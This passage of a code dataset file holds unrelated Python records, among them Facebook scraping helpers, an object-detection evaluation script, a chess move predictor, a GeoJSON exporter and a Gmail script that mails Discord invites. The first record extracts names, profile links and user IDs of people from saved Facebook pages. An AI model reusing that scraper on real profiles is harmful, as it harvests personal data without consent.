data.replace('3D\"','\"')\n return data\n\ndef rewriteDocument(name, newname):\n \"\"\"Rewrite the document in format used in the system\"\"\"\n with open(newname,'w+') as m:\n m.write(fixData(loadDocument(name)))\n\ndef hovercardGetFBID(data):\n \"\"\"Extract the userID from a hovercard\"\"\"\n data = str(data)\n data = data.replace('=3D','=')\n data = data.replace('\"\"','\"')\n a = data.split('&')[0]\n start = a.find('id=')\n return a[start+len('id='):]\n\ndef generateSoup(data):\n return BeautifulSoup.BeautifulSoup(data)\n\ndef findAllHovercard(soup):\n \"\"\"Find all links with a hovercard and data\"\"\"\n return soup.findAll(\"a\", { \"data-hovercard\" : True, 'data-gt':True})\n\ndef getPeopleOnPage(soup):\n \"\"\"Get all the 'people on the page, this function may give too much data \"\"\"\n out = []\n people = 
findAllHovercard(soup)\n for person in people:\n if not person.contents == []:\n #Check for empty lists\n temp = str(person.contents[0])\n if temp[0] != '<':\n #Generate the tuple and split the url so we can't be tracked\n out.append((str(person.contents[0]),person.get('href').split('?')[0], hovercardGetFBID(person.get(\"data-hovercard\"))))\n return out\n\ndef getPageSubject(data):\n start = data.find('Subject: ')\n end = data.find(enter, start)\n return data[start + len('Subject: '):end]\n\ndef generateFriendsHTML():\n \"\"\"\n Generate a page with links to all the first grade friends\n :return: nothing, the page will be written to disk\n \"\"\"\n friends = friendsGetFirstDegree()\n with open('../output/html/friendshtml.html','w+') as m:\n m.write('')\n for friend in friends:\n # the anchor markup here was lost when the HTML tags were stripped;\n # this assumes each friend row itself can serve as the link target\n m.write('<a href=\"' + str(friend) + '\">Friend</a><br>
')\n m.write('')\n\n#Testing:\n\n#print getPageSubject(loadDocument(\"../data/friends/\"))\n\n#generateFriendsHTML()\n\n","sub_path":"scraping/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"297541783","text":"import os\nfrom dotenv import load_dotenv\nimport json\nimport shutil\nfrom loading_data import queryDB, get_classmap\nfrom loading_data import download_annotations\nimport pandas as pd\nfrom keras_retinanet import models\nfrom keras_retinanet.utils.model import freeze as freeze_model\nfrom keras.utils import multi_gpu_model\nfrom keras_retinanet import losses\nfrom keras_retinanet.preprocessing.csv_generator import CSVGenerator\nfrom keras_retinanet.models.retinanet import retinanet_bbox\nimport keras\nfrom model_scoring import f1_evaluation\nfrom keras_retinanet.utils.eval import evaluate\nfrom keras_retinanet.models import convert_model\nfrom keras_retinanet.models import load_model\n\nconfig_path = \"../config.json\"\nload_dotenv(dotenv_path=\"../.env\")\nwith open(config_path) as config_buffer: \n config = json.loads(config_buffer.read())['ml']\n\ntrain_annot_file = config['train_annot_file']\nvalid_annot_file = config['valid_annot_file']\nimg_folder = config['image_folder']\ntest_examples = config['test_examples']\nbatch_size = config['batch_size']\ngood_users = config['biologist_users']\n\n\n'''\n Evaluates the model using testing data, printing out an F1 score as well as optimal confidence thresholds for each concept\n'''\ndef evaluate_model(concepts, model_path, min_examples, download_data=False):\n\n classmap = get_classmap(concepts)\n\n if download_data:\n folders = []\n folders.append(test_examples)\n for dir in folders:\n if os.path.exists(dir):\n shutil.rmtree(dir)\n os.makedirs(dir)\n download_annotations(min_examples, concepts, classmap, good_users, img_folder, train_annot_file, valid_annot_file, split=0)\n\n '''\n Initializing model for eval\n '''\n model = load_model(model_path, backbone_name='resnet50')\n model = convert_model(model)\n\n temp = pd.DataFrame(list(zip(classmap.values(), classmap.keys())))\n temp.to_csv('classmap.csv',index=False, header=False)\n test_generator = CSVGenerator(\n valid_annot_file,\n 'classmap.csv',\n shuffle_groups=False,\n batch_size=batch_size\n )\n\n best_f1, best_thresh = f1_evaluation(test_generator, model, save_path=test_examples)\n\n total_f1 = 0\n for concept, f1 in best_f1.items():\n print(\"Concept: \" + classmap[concept])\n print(\"F1 Score: \" + str(f1))\n print(\"Confidence Threshold: \" + str(best_thresh[concept]))\n print(\"\")\n total_f1 += f1\n\n print(\"Average F1: \" + str(total_f1/len(best_f1)))\n print(\"Find evaluation examples in: \" + test_examples)\n '''\n average_precisions = evaluate(test_generator, model, save_path=test_examples)\n\n for concept, (ap, instances) in average_precisions.items():\n print(classmap[concept] +\": \" + str(ap) + \" with \" + str(instances) + \" instances\")\n \n print(\"Find evaluation examples in: \" + test_examples)\n '''\n\nif __name__ == '__main__':\n min_examples = 1000\n concepts = [1629, 1210, 236, 383, 1133]\n model_path = 'current_weights.h5'\n\n evaluate_model(concepts, model_path, min_examples, download_data=False)\n\n","sub_path":"ml/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"619944720","text":"# 
funcs: convert result from yolo to submit\n# notice: use for 14belt only\n\nimport argparse\nimport json\nimport os\nimport copy\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--json', type=str, default='', help='json file, need cooco format')\nopt = parser.parse_args()\nfp_json = opt.json\n\n\n\n# load coco_list\nwith open(fp_json) as f:\n yolo_list = json.load(f)\n\n# load fn-id map\nwith open('link_image_fn_id.json') as f:\n map = json.load(f)\n\n# xywh > xyxy\nfor i,val in enumerate(yolo_list):\n x,y,w,h = yolo_list[i]['bbox']\n x2,y2 = x+w,y+h\n yolo_list[i]['bbox'] = [x,y,x2,y2]\n\n# # # only keep score that >= 0.2\n# cutted_list = [val for i, val in enumerate(yolo_list) if val['score'] >= 0.2]\n# yolo_list = cutted_list\n\n\n# remove cls_id=0\n# yolo_list = [ ele for ele in yolo_list if ele['category_id'] != 0 ]\n\n\n# image_id fn2int\nyolo_list_debug = copy.deepcopy(yolo_list)\nfor i,val in enumerate(yolo_list):\n fn_no_ext = yolo_list[i]['image_id']\n yolo_list[i]['image_id'] = map[fn_no_ext] # fn_no_ext > int_id\n yolo_list_debug[i]['image_id'] = (map[fn_no_ext], fn_no_ext) # denug\n\n\nfn_json = os.path.basename(fp_json)\nfn_json_no_ext = os.path.splitext(fn_json)[0]\nfn_out = fn_json_no_ext + '_submit.json'\nfp_out = fn_out\n\n\n\nwith open(fp_out, 'w') as fp:\n json.dump(yolo_list, fp )\n # json.dump(to_submit, fp, indent=4)\n\n\nprint('saved, check: ', fp_out)\n\n# with open('submit_debug.json', 'w') as fp:\n# json.dump(yolo_list_debug, fp )\n# # json.dump(to_submit, fp, indent=4)","sub_path":"02result_yolo2submit.py","file_name":"02result_yolo2submit.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"473048177","text":"import chess\nimport random\nfrom FEN_to_Array import FENtoArray\nimport keras\nfrom keras.models import model_from_json\nimport pandas as pd\nfrom pandas import DataFrame\n\nboard = chess.Board()\n\nimport time\n\nmaxMovesToAnalyze = 4\n\nclass predictor():\n \n def __init__(self):\n \n # Load neural network model\n \n self.model_name = \"trained_models/ready_to_deploy\"\n \n json_file = open(self.model_name + '.json', 'r')\n loaded_model_json = json_file.read()\n json_file.close()\n self.loaded_model = model_from_json(loaded_model_json)\n # load weights into new model\n self.loaded_model.load_weights(self.model_name + \".h5\")\n # print(\"Loaded model from disk\")\n \n # Load model\n \n self.loaded_model.compile(optimizer = \"adam\", loss = \"binary_crossentropy\", metrics = [\"accuracy\"])\n \n def makePrediction(self,data):\n \n X_test = data.tolist() # Turn into list\n X_test = [X_test] # Make it an array\n X_test = DataFrame.from_records(X_test) # Turn into DataFrame\n \n# print(X_test)\n \n # Run prediction using the neural network\n \n y_pred = self.loaded_model.predict(X_test) # returns the probability of each entry\n \n# print(y_pred)\n \n last = len(y_pred) - 1\n result = y_pred[last]\n \n return(result)\n\npredictor = predictor()\n\nstart = time.time()\n\n#print (result)\n\n\ndef getBestMove(board):\n \n possibleMoves = list(board.legal_moves)\n random.shuffle(possibleMoves)\n \n moveList = possibleMoves # Store it for later, to pick the winning move from\n \n# print(\"Possible Moves:\\n%s\"%(possibleMoves))\n \n winningChance = []\n \n index = 0\n \n for move in possibleMoves:\n \n# print(\"Stepping forward ...\")\n \n nextMove = possibleMoves[0]\n# print(\"Next move:\")\n# print(nextMove)\n possibleMoves.pop(0)\n \n 
board.push(nextMove)\n \n# print(board)\n \n nextString = board.fen()\n FEN = nextString.split(\" \")\n FEN = FEN[0]\n \n arr = FENtoArray(FEN)\n prediction = predictor.makePrediction(arr)\n \n winningChance.append(prediction)\n \n board.pop()\n \n index += 1\n \n if index >= maxMovesToAnalyze:\n \n# print(\"BREAKING\")\n \n break\n \n# print(\"Moves by win chance:\")\n \n# print(\"winner is:\")\n \n winner = winningChance.index(max(winningChance))\n \n# print (winner)\n \n# print (winningChance)\n# print (moveList)\n \n winningMove = moveList[winner]\n \n# print(\"Returning:\\n%s\" %(winningMove))\n \n end = time.time()\n# print(end - start)\n \n return winningMove\n","sub_path":"getBestMove.py","file_name":"getBestMove.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"256922740","text":"import os\nimport pathlib\nimport re\nimport shutil\nimport subprocess\n\nimport click\nimport git\n\n\n# Define the CLI options\n@click.command()\n@click.argument('SOURCE')\n@click.argument('OUTPUT')\n@click.option('--expandprism', is_flag=True)\n@click.option('--zipmodules', is_flag=True)\ndef cli(source, output, expandprism, zipmodules):\n # Make sure `source` is valid\n if 'libraries' in output:\n raise RuntimeError(\n 'Please point this tool to the root directory of the project'\n )\n\n source = pathlib.Path(source)\n output = pathlib.Path(output)\n\n # Obtain the repo's commit SHA\n repo = git.Repo(str(source))\n latest = repo.commit(repo.active_branch)\n sha = latest.hexsha[:8]\n\n # Extract the remote repo name\n url = list(repo.remotes.origin.urls)[0]\n name = re.match(r'^.*?/([\\w\\-_]*)$', url).group(1)\n\n # Extrapolate the destination file path\n newName = f'{name}-{repo.active_branch}-{sha}.zip'\n newPath = output / 'libraries' / newName\n\n # If the archive already exists, delete it\n if newPath.exists():\n newPath.unlink()\n\n # Open the XML file\n xmlNames = ['commonUI_properties.xml', 'properties.xml']\n xmlPath = None\n for xmlName in xmlNames:\n xmlPath = output / 'antxml' / xmlName\n if xmlPath.exists():\n break\n with open(xmlPath, 'r') as xmlFile:\n xmlData = xmlFile.read()\n\n # Get the current packaged file\n currentName = re.search(\n f'/({name}.*?\\\\.zip)\"',\n xmlData\n ).group(1)\n currentPath = output / 'libraries' / currentName\n if currentPath.exists():\n currentPath.unlink()\n\n # Replace the name in the file\n xmlData = re.sub(\n f'/({name}.*?\\\\.zip)\"',\n f'/{newName}\"',\n xmlData\n )\n with open(xmlPath, 'w') as xmlFile:\n xmlFile.write(xmlData)\n\n # Construct the command arguments and run\n subprocess.run([\n '7z', 'a', '-tzip', '-mmt', '-mx9',\n str(newPath),\n f'{source}/*',\n f'-xr!{source / \".git\"}',\n f'-x@{source / \".gitignore\"}',\n ])\n\n # IF expand flag is specified, delete the mode_modules prism folder and\n # expand the newly created archive into that directory\n if expandprism:\n prismPath = \\\n output / 'node_modules' / '@spectrum-prism' / 'prism-components'\n\n # Delete the existing directory (or link)\n if prismPath.is_file() or prismPath.is_symlink():\n prismPath.unlink()\n elif prismPath.is_dir():\n shutil.rmtree(prismPath)\n\n # Unpack the archive\n subprocess.run([\n '7z', 'x',\n str(newPath),\n f'-o{prismPath}',\n ])\n\n # If zip flag is specified, zip up the node_module folder for building\n if zipmodules:\n # Construct and validate paths\n prismPath = 'node_modules/@spectrum-prism/prism-components'\n nodeZipPath = output / 'libraries' / 
'node_modules_unix.zip'\n\n # Delete prism-components from the zip\n subprocess.run([\n '7z', 'd',\n str(nodeZipPath),\n 'node_modules/@spectrum-prism/prism-components'\n ])\n\n # Add current prism-components to the zip\n os.chdir(output)\n subprocess.run([\n '7z', 'u',\n str(nodeZipPath),\n str(prismPath),\n f'-xr!{prismPath}/.git',\n ])\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"spgill/ibm/repack/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"22292228","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\nimport turtle\n\nt = turtle\nt.reset()\nN = 512\n# t.pencolor(\"black\")\nt.pensize(5)\nt.speed(3000)\nR = 240\nt.penup()\nt.goto(0,-R)\nt.pendown()\nt.fillcolor(\"gray\")\nt.pencolor(\"gray\")\nturtle.fill(True)\nt.circle(R)\nturtle.fill(False)\n\nt.pencolor(\"black\")\n\ndef draw_taiji(drawYang = False):\n t.left(90)\n d = 360./N\n STEP = R*2./N\n for i in range(0,N):\n t.penup()\n t.goto(0,0)\n t.right(d)\n\n if drawYang:\n t.pendown()\n\n y = int(R - i*STEP)\n\n if y > 0:\n t.pencolor(\"white\")\n t.forward(y)\n if not drawYang:\n t.pendown()\n t.pencolor(\"black\")\n t.forward(R-y)\n else:\n if not drawYang:\n t.pendown()\n t.pencolor(\"black\")\n t.forward(R+y)\n\n if drawYang:\n t.pencolor(\"white\")\n t.forward(-y)\n\ndraw_taiji(False)\nt.clear()\ndraw_taiji(False)\nt.clear()\ndraw_taiji()\n\nraw_input(\"press.....\")\n\n\n","sub_path":"tools/yijing/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"638818355","text":"import logging\n\nfrom pydantic import ValidationError\n\nfrom geojson import Feature, FeatureCollection, Point, dumps\nfrom opennem.controllers.stations import get_stations\nfrom opennem.core.facility_duid_map import duid_is_retired\nfrom opennem.db import get_database_session\nfrom opennem.exporter.encoders import OpenNEMGeoJSONEncoder\nfrom opennem.schema.opennem import StationSchema\n\n__all__ = [\"stations_geojson_serialize\"]\n\nlogger = logging.getLogger(__name__)\n\n\ndef stations_geojson_records():\n db = get_database_session()\n\n stations = get_stations(db)\n\n records = []\n\n for station in stations:\n\n geom = None\n\n if station.lat and station.lng:\n geom = Point((station.lat, station.lng))\n\n f = Feature(geometry=geom)\n\n f.properties = {\n \"oid\": station.oid,\n \"ocode\": station.ocode,\n \"station_id\": station.id,\n \"station_code\": station.network_code,\n \"facility_id\": station.network_code,\n \"network\": station.network.label,\n \"network_country\": station.network.country,\n \"state\": station.state.upper() if station.state else None,\n \"postcode\": station.postcode,\n \"name\": station.name,\n \"capacity_registered\": station.capacity_registered,\n \"capacity_aggregate\": station.capacity_aggregate,\n \"duid_data\": [],\n }\n\n for facility in station.facilities:\n if facility.fueltech_id is None:\n continue\n\n if facility.status_id is None:\n continue\n\n if duid_is_retired(facility.code):\n continue\n\n if facility.active is False:\n continue\n\n f.properties[\"duid_data\"].append(\n {\n \"oid\": facility.oid,\n \"duid\": facility.duid,\n \"fuel_tech\": facility.fueltech_id,\n \"fuel_tech_label\": facility.fueltech_label,\n \"fuel_tech_renewable\": facility.fueltech.renewable\n if facility.fueltech\n else None,\n \"commissioned_date\": facility.registered,\n 
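# NOTE (editor): GeoJSON positions are (longitude, latitude). stations_geojson_records above builds Point((station.lat, station.lng)), while stations_geojson_records_json below builds Point((station.lng, station.lat)); only the latter ordering matches the GeoJSON spec. Also note that List[StationSchema] is used later without a `from typing import List` import.\n                    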
\"decommissioned_date\": facility.deregistered,\n \"status\": facility.status_id,\n \"status_label\": facility.status_label,\n \"unit_id\": facility.unit_id,\n \"unit_number\": facility.unit_number,\n \"unit_size\": facility.unit_capacity,\n \"unit_alias\": facility.unit_alias,\n # capacities for the unit\n \"capacity_registered\": facility.capacity_registered,\n \"capacity_aggregate\": facility.capacity_aggregate,\n # network specific fields (DUID is one)\n \"network_region\": facility.network_region,\n }\n )\n\n if len(f.properties[\"duid_data\"]) > 0:\n records.append(f)\n\n return records\n\n\ndef stations_geojson_records_json(stations: List[StationSchema]):\n records = []\n\n for station in stations:\n\n geom = None\n\n if not station.facilities:\n continue\n\n if station.lat and station.lng:\n geom = Point((station.lng, station.lat))\n\n f = Feature(geometry=geom)\n\n f.properties = {\n # \"oid\": station.oid,\n # \"ocode\": station.ocode,\n \"station_id\": station.id,\n \"station_code\": station.code,\n \"facility_id\": station.code,\n \"network\": station.facilities[0].network.label,\n \"network_country\": station.facilities[0].network.country,\n \"state\": station.state,\n \"postcode\": station.postcode,\n \"name\": station.name,\n \"capacity_registered\": station.capacity_registered,\n # \"capacity_aggregate\": station.capacity_aggregate,\n \"duid_data\": [],\n }\n\n for facility in station.facilities:\n if facility.fueltech is None:\n continue\n\n if facility.status is None:\n continue\n\n if duid_is_retired(facility.code):\n continue\n\n if facility.active is False:\n continue\n\n f.properties[\"duid_data\"].append(\n {\n # \"oid\": facility.oid,\n # \"duid\": facility.duid,\n \"fuel_tech\": facility.fueltech.code,\n \"fuel_tech_label\": facility.fueltech.label,\n \"fuel_tech_renewable\": facility.fueltech.renewable,\n \"commissioned_date\": facility.registered,\n \"decommissioned_date\": facility.deregistered,\n \"status\": facility.status.code,\n \"status_label\": facility.status.label,\n \"unit_id\": facility.unit_id,\n \"unit_number\": facility.unit_number,\n \"unit_size\": facility.unit_capacity,\n \"unit_alias\": facility.unit_alias,\n # capacities for the unit\n \"capacity_registered\": facility.capacity_registered,\n # \"capacity_aggregate\": facility.capacity_aggregate,\n # network specific fields (DUID is one)\n \"network_region\": facility.network_region,\n }\n )\n\n if len(f.properties[\"duid_data\"]) > 0:\n records.append(f)\n\n return records\n\n\ndef stations_geojson_serialize(stations: List[StationSchema]):\n crs = {\n \"type\": \"name\",\n \"properties\": {\"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\"},\n }\n\n stations = stations_geojson_records_json(stations)\n\n geoj = FeatureCollection(stations, crs=crs, name=\"opennem\")\n\n geoj[\"name\"] = \"opennem_stations\"\n geoj[\"crs\"] = crs\n\n geoj_string = dumps(geoj, indent=4, cls=OpenNEMGeoJSONEncoder)\n\n return geoj_string\n\n\nif __name__ == \"__main__\":\n stations_geojson_serialize()\n","sub_path":"opennem/exporter/geojson.py","file_name":"geojson.py","file_ext":"py","file_size_in_byte":6062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"180337598","text":"from first.models import Order, Product_order, Bakery, Category, Account, Product\nimport datetime\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# NEED wordt niet gebruikt\ndef getLastOrdersClient(accountIdIn,N):\n\n list1 = Order.objects.all()[::-1]\n #inverse order because we want 
the last orders as last for simplicity in the end\n list2 = Product_order.objects.all()\n\n output = []\n\n for order in list1:\n if order.accountId == accountIdIn:\n temp = {}\n temp['date'] = str(order.timePickup.date())\n b = order.timePickup.replace(tzinfo=None).date() - datetime.datetime.now().date()\n temp['NumDaysPast'] = -b.days\n temp['totalPrice'] = order.totalPrice\n temp2 = []\n for product_order in list2:\n if product_order.orderId == order.id:\n dict1 = {}\n dict1['productId'] = product_order.productId\n dict1['amount'] = product_order.amount\n temp2.append(dict1)\n\n temp['products'] = temp2\n\n output.append(temp)\n\n #here we take the last N elements\n return output[:N]\n\n\ndef get_allDayOrders(bakeryId,firstDay,lastDay):\n\n try:\n bakeryObject = Bakery.objects.get(id = bakeryId)\n\n date1 = datetime.datetime.fromtimestamp(firstDay/1000.).date()\n date2 = datetime.datetime.fromtimestamp(lastDay/1000.).date()\n today = datetime.date.today()\n nowHour = datetime.datetime.now().hour\n nowMinute = datetime.datetime.now().minute\n bestelLimitTime = bakeryObject.bestelLimitTime.split(\":\")\n pastBestelLimitTime = (nowHour >= int(bestelLimitTime[0]) and nowMinute >= int(bestelLimitTime[1]))\n diff = (date1-date2).days\n diff2 = (datetime.datetime.now().date() - date1).days\n output = []\n\n for i in range(diff+1):\n dummy = {}\n temp = date1 - datetime.timedelta(i)\n dummy['date'] = int(temp.strftime(\"%s\")) * 1000\n dummy['numDaysPast'] = diff2 + i\n dummy['totalOrders'] = 0\n dummy['totalPrice'] = 0\n diffDays = (today-(datetime.date.fromtimestamp(dummy['date']/1000))).days\n dummy['frozen'] = diffDays > 0 \\\n or ((diffDays == 0) and (pastBestelLimitTime))\n output.append(dummy)\n orders = Order.objects.all().exclude(status='cancelled')\n\n # NEED kan sneller als je in de lijn hierboven gewoon filtert\n for order in orders:\n datePickup = order.timePickup.replace(tzinfo=None).date()\n if order.bakeryId == bakeryId and datePickup >= date2 and datePickup <= date1:\n index = (date1 - datePickup).days\n output[index]['totalOrders'] += 1\n output[index]['totalPrice'] += order.totalPrice\n\n except ObjectDoesNotExist:\n output = 'bakerydoesnotexist'\n\n return output\n\n\ndef get_dayOrder(bakeryId,dateMS):\n date = datetime.datetime.fromtimestamp(dateMS/1000.)\n\n #check if bakery exists\n try:\n a = Bakery.objects.get(id = bakeryId)\n\n list1 = Order.objects.all().exclude(status='cancelled')\n categories = Category.objects.all()\n names = {}\n for category in categories:\n names[str(category.id)] = category.name\n output = {}\n output['date'] = dateMS\n output['totalNumOrders'] = 0\n output['totalMoney'] = 0\n output['orders'] = []\n output['aggregateOrder'] = []\n dummyCategory = []\n dummyName = []\n dummyAmount = []\n dummyId = []\n\n for order in list1:\n if order.timePickup.replace(tzinfo=None).date()== date.date() and order.bakeryId == bakeryId:\n orderId = order.id\n outputClient = {}\n accountId = order.accountId\n account = Account.objects.get(id = accountId)\n outputClient['firstName'] = account.firstname\n outputClient['lastName'] = account.lastname\n outputClient['products'] = []\n outputClient['totalPrice'] = order.totalPrice\n outputClient['remarks'] = order.comment\n outputClient['isPayed'] = 0 #TODO\n\n list2 = Product_order.objects.all()\n for productOrder in list2:\n if productOrder.orderId == orderId:\n product = Product.objects.get(id=productOrder.productId)\n productDict = {}\n productDict['id'] = productOrder.productId\n productDict['amount'] = 
productOrder.amount\n                        productDict['price'] = productOrder.price\n                        productDict['name'] = product.name\n                        outputClient['products'].append(productDict)\n                        dummyCategory.append(names[str(product.category_id)])\n                        dummyName.append(product.name)\n                        dummyId.append(productOrder.productId)\n                        dummyAmount.append(productOrder.amount)\n\n\n                output['orders'].append(outputClient)\n                output['totalNumOrders'] += 1\n                output['totalMoney'] += order.totalPrice\n\n        aggregate = []\n        categoryDict = {}\n        for category in dummyCategory:\n            categoryDict[str(category)] = {}\n        nameDict = {}\n        for name in dummyName:\n            nameDict[str(name)] = {}\n            nameDict[str(name)]['amount'] = 0\n            nameDict[str(name)]['id'] = 0\n            nameDict[str(name)]['name'] = ''\n\n        for i in range(len(dummyName)):\n            name = dummyName[i]\n            nameDict[str(name)]['name'] = str(name)\n            nameDict[str(name)]['amount'] += dummyAmount[i]\n            nameDict[str(name)]['id'] = dummyId[i]\n            categoryDict[str(dummyCategory[i])][str(name)] = 0\n\n        for key1 in categoryDict:\n            tempDict = {}\n            tempDict['categoryName'] = key1\n            tempDict['products'] = []\n            for key2 in categoryDict[key1]:\n                tempDict['products'].append(nameDict[key2])\n\n            aggregate.append(tempDict)\n\n        output['aggregateOrder'] = aggregate\n\n    except ObjectDoesNotExist:\n        output = 'bakerydoesnotexist'\n\n    return output\n\n\ndef getPreviousOrdersAcrossBakeries(accountId):\n    # loop over all bakeries\n    objects = Bakery.objects.all()\n    output = []\n    for bakery in objects:\n        currentBakeryOrders = getPreviousOrders(int(accountId),int(bakery.id))\n        if currentBakeryOrders != 'ordersnotfound':\n\n            # NEED does this still work?\n            # calculate total price for each order with the current prices\n            for order in currentBakeryOrders:\n                totalPrice = 0\n                for product in order['products']:\n                    totalPrice += product['amount']*product['price']\n                order['totalPrice'] = totalPrice\n                # add bakery id to order\n                order['bakeryId'] = bakery.id\n                order['bakeryName'] = bakery.name\n\n            # add orders to output\n            output.extend(currentBakeryOrders)\n    return output\n\n\ndef getPreviousOrders(accountId,bakeryId):\n\n    output = 0\n    #check if account exists\n\n    try:\n        a = Account.objects.get(id = accountId)\n    except ObjectDoesNotExist:\n        output = 'accnotfound'\n    #check if bakery exists\n    try:\n        a = Bakery.objects.get(id = bakeryId)\n    except ObjectDoesNotExist:\n        output = 'bakerydoesnotexist'\n\n    if output == 0:\n        xSort = []\n        output = []\n        orders = Order.objects.all()\n        productOrders = Product_order.objects.all()\n\n        for order in orders:\n            orderTemp = {}\n            if order.accountId == accountId and order.bakeryId == bakeryId:\n                orderTemp['date'] = int(order.timePickup.date().strftime(\"%s\")) * 1000\n                b = order.timePickup.replace(tzinfo=None).date() - datetime.datetime.now().date()\n                orderTemp['numDaysPast'] = -b.days\n                orderTemp['id'] = order.id\n                orderTemp['products'] = []\n                for productOrder in productOrders:\n                    productDict = {}\n                    if productOrder.orderId == order.id:\n                        productId = productOrder.productId\n                        product = Product.objects.get(id = productId)\n                        productDict['price'] = productOrder.price\n                        productDict['name'] = product.name\n                        productDict['id'] = productId\n                        productDict['photoId'] = product.photoId\n\n                        productDict['amount'] = productOrder.amount\n                        orderTemp['products'].append(productDict)\n                orderTemp['status'] = order.status\n                xSort.append(orderTemp['numDaysPast'])\n                output.append(orderTemp)\n        if len(xSort) > 0:\n            xSort, output = zip(*sorted(zip(xSort, output)))\n    else:\n        output = 'ordersnotfound'\n\n    return 
output","sub_path":"src/FRG/orderLookUp.py","file_name":"orderLookUp.py","file_ext":"py","file_size_in_byte":9203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"222031633","text":"import os\r\nimport gspread\r\nfrom googleapiclient.discovery import build\r\nimport base64\r\nfrom email.mime.text import MIMEText\r\nfrom apiclient import errors\r\nfrom email.utils import formataddr\r\n\r\n\r\n# 1. Gmail APIのスコープを設定\r\nGMAIL_DEFAULT_SCOPES = gspread.auth.DEFAULT_SCOPES + ['https://www.googleapis.com/auth/gmail.send']\r\n\r\n\r\n# 招待リンク\r\nINVITE_LINK = os.environ[\"DISCORD_INVITE_LINK\"]\r\n\r\n# Spread Sheet\r\ngc = gspread.oauth(GMAIL_DEFAULT_SCOPES)\r\n\r\nsh = gc.open_by_key(\"1QJmehI1eJDcYUAlDVulUe_P-gez_Xd6S5en0jk0A4B0\")\r\nws = sh.worksheet('第2回通過者')\r\n\r\n\r\n# 2. メール本文の作成\r\ndef create_message(to, subject, message_text):\r\n message = MIMEText(message_text)\r\n message['to'] = to\r\n message['from'] = formataddr(('KUN Lab採用 (かめすた)', 'kamesuta@gmail.com'))\r\n message['subject'] = subject\r\n encode_message = base64.urlsafe_b64encode(message.as_bytes())\r\n return {'raw': encode_message.decode()}\r\n\r\n\r\n# 3. メール送信の実行\r\ndef send_message(service, user_id, message):\r\n try:\r\n message = (service.users().messages().send(userId=user_id, body=message)\r\n .execute())\r\n print('Message Id: %s' % message['id'])\r\n return message\r\n except errors.HttpError as error:\r\n print('An error occurred: %s' % error)\r\n\r\n\r\n# 5. アクセストークンの取得\r\nservice = build('gmail', 'v1', credentials=gc.auth)\r\n\r\n\r\ndef send_invite_email(to, user_name, user_token):\r\n # 6. メール本文の作成\r\n subject = '[第2回 KUN Lab選考] 選考通過と、Discordへの参加について'\r\n message_text = f'''\\\r\n{user_name} 様\r\n\r\nこのたびは第2回 KUN Lab選考にご応募いただきありがとうございます。\r\n試験の結果、二次試験にお進みいただきたくご連絡差し上げました。\r\n\r\nついては、Discordの参加をご案内させていただきます。\r\n下記のリンクからご参加いだだいた後、Discord内の案内に従い下記の認証コードの入力をお願いします。\r\n\r\n▼ Discord招待URL\r\n{INVITE_LINK}\r\n\r\n▼ あなたの認証コード (6桁)\r\n{user_token}\r\n※注意 認証コードを他の人に教えないでください。\r\n\r\n-------------------------------------------------------\r\nKUN Lab\r\n採用担当:かめすた\r\nE-mail  kamesuta@gmail.com\r\nTwitter https://twitter.com/Kmesuta\r\n-------------------------------------------------------\r\n'''\r\n message = create_message(to, subject, message_text)\r\n\r\n # 7. 
Gmail APIを呼び出してメール送信\r\n send_message(service, 'me', message)\r\n\r\n\r\nselectorB = f'B2:B{ws.row_count}'\r\n\r\nsample = ws.range(selectorB)\r\nsa_count = max([cell.row for cell in sample if cell.value])\r\nsh_count = sa_count - 1\r\n\r\nselectorB = f'B2:B{sa_count}'\r\nselectorD = f'O2:O{sa_count}'\r\nselectorN = f'Q2:Q{sa_count}'\r\n\r\nusers = ws.batch_get([selectorB, selectorD, selectorN])\r\n\r\nfor i in range(sh_count):\r\n user_email = users[0][i][0]\r\n user_name = users[1][i][0]\r\n user_token = users[2][i][0]\r\n\r\n send_invite_email(user_email, user_name, user_token)\r\n print(f'Email:{user_email}, ID:{user_name}, Token:{user_token}')\r\n","sub_path":"lab2/send_invite_email.py","file_name":"send_invite_email.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"46878013","text":"class Person:\n first_name: str = ''\n last_name: str = ''\n properties = {}\n\n def __init__(self, first_name: str, last_name: str):\n \"\"\"\n Set the person's first and last name.\n\n :param first_name:\n :param last_name:\n \"\"\"\n self.first_name = first_name\n self.last_name = last_name\n\n def __repr__(self) -> str:\n # This uses the `full_name` property right now but should be improved\n # to provide more information.\n return self.full_name\n\n @property\n def full_name(self) -> str:\n return '{} {}'.format(self.first_name, self.last_name)\n\n\nperson = Person('James', 'Taylor')\nperson.properties['favorite_movie'] = 'Meet Joe Black'\nperson.properties['favorite_food'] = 'Ice-Cream'\n\n#\n\n# No limit to what you can assign to a Dictionary\n\nmy_dict = {} # empty\n\n# Item assignment\nmy_dict['favorite_movie'] = 'Meet Joe Black'\nmy_dict['favorite_food'] = 'Ice-Cream'\nmy_dict['age'] = 36\n\n\n# Assignment at creation\nmy_other_dict = {\n 'fav_movie': 'Meet Joe Black',\n 'favorite_food': 'pizza'\n}\n\nmy_dict['favorite_movie'] # Getting a key from a 